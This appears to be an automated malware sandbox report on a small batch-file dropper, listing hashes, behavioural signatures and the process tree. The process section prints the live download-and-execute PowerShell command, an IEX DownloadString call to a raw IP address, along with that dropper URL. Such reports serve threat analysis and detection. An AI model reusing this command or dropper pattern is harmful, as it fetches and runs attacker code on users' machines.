Analysis
max time kernel: 146s
max time network: 89s
platform: windows10_x64
resource: win10v200430
submitted: 12-07-2020 22:10
Static task: static1
Behavioral task: behavioral1
  Sample: f012b64a4c409c683d9fb217954bb81e.bat
  Resource: win7 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: f012b64a4c409c683d9fb217954bb81e.bat
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: f012b64a4c409c683d9fb217954bb81e.bat
Size: 220B
MD5: 3630e6bfeceaf5ae9f0fe776b8146e0b
SHA1: 233dfd6ce74130dd5c4fea4cfde910b51544c5fd
SHA256: 4af01116ea53d684aab434e8d65d4fd28822df7f13ada9a7a0a80c8f188fdf9e
SHA512: 677811903d0bb197ccd3a66b02c1b5c14cd9956cc7668fa8ead565b25941ba3531bc00b6aebbdfc8a3a600bd318f0c1e5fe80c7f421243c6f3c068f81b7ef62a
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: ps1.dropper
URLs: http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e
Signatures

Suspicious use of WriteProcessMemory (3 IoCs)
Processes:
  description                        pid   process   target process
  PID 3544 wrote to memory of 516    3544  cmd.exe   powershell.exe
  PID 3544 wrote to memory of 516    3544  cmd.exe   powershell.exe
  PID 3544 wrote to memory of 516    3544  cmd.exe   powershell.exe

Program crash (1 IoC)
Processes:
  pid   pid_target   process        target process
  920   516          WerFault.exe   powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                 pid   process
  Token: SeRestorePrivilege   920   WerFault.exe
  Token: SeBackupPrivilege    920   WerFault.exe
  Token: SeDebugPrivilege     920   WerFault.exe

Suspicious behavior: EnumeratesProcesses (13 IoCs)
Processes:
  pid   process
  920   WerFault.exe   (13 identical entries)
Processes

1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f012b64a4c409c683d9fb217954bb81e.bat"
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e');Invoke-CSLQTFNOIPZFU;Start-Sleep -s 10000"

      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 704
         - Program crash
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Downloads
memory/516-0-0x0000000000000000-mapping.dmp
memory/516-2-0x0000000000000000-mapping.dmp
memory/516-3-0x0000000000000000-mapping.dmp
memory/516-5-0x0000000000000000-mapping.dmp
memory/516-4-0x0000000000000000-mapping.dmp
memory/516-6-0x0000000000000000-mapping.dmp
memory/516-7-0x0000000000000000-mapping.dmp
memory/920-1-0x0000000004B90000-0x0000000004B91000-memory.dmp (Filesize: 4KB)
memory/920-8-0x00000000051C0000-0x00000000051C1000-memory.dmp (Filesize: 4KB)